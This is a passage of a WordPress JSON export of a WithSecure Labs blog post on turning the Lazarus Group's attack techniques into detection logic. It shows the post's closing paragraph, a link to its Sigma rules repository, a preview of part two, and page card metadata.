Introducing new rules to a network is often an iterative process of development and whitelisting to bring the rules to a suitable level of fidelity.<\/p>\n<p>All of the new Sigma rules referenced throughout this blog post can be found <a href=\"https:\/\/github.com\/countercept\/lazarus-sigma-rules\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p>In the second part of this blog series we will cover techniques used by the Lazarus Group for Defense Evasion (yes, there is more to come!), Credential Access, Lateral Movement and Command &amp; Control phases, so stay tuned!<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/catching-lazarus-threat-intelligence-to-real-detection-logic-part-one\/&#038;title=Catching%20Lazarus:%20Threat%20Intelligence%20to%20Real%20Detection%20Logic%20&#8211;%20Part%20One\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Partager sur LinkedIn\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Catching Lazarus: Threat Intelligence to Real Detection Logic 
    <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>This is the first of two blog posts from the F-Secure Countercept team discussing how the Tactics, Techniques and Procedures (TTPs) used by the Lazarus Group in a recent campaign can be turned into detection logic.<\/p>\n","protected":false},"author":3,"featured_media":0,"template":"","categories":[306,328,308],"labs_content_type":[309],"class_list":["post-10533","lab_item","type-lab_item","status-publish","hentry","category-attack-detection","category-endpoint-security","category-threat-intelligence"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg 618w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-300x214.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-447x318.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-205x146.jpg 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Endpoint Security<\/span>\n                   
                         <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Catching Lazarus: Threat Intelligence to Real Detection Logic &#8211; Part One<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">This is the first of two blog posts from the F-Secure Countercept team discussing how the Tactics, Techniques and Procedures (TTPs) used by the Lazarus Group in a recent campaign can be turned into detection logic.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/catching-lazarus-threat-intelligence-to-real-detection-logic-part-one\/\">En savoir plus<\/a>            <\/div>\n            <\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/lab_item\/10533","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/users\/3"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/media?parent=10533"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/categories?post=10533"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/labs_content_type?post=10533"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}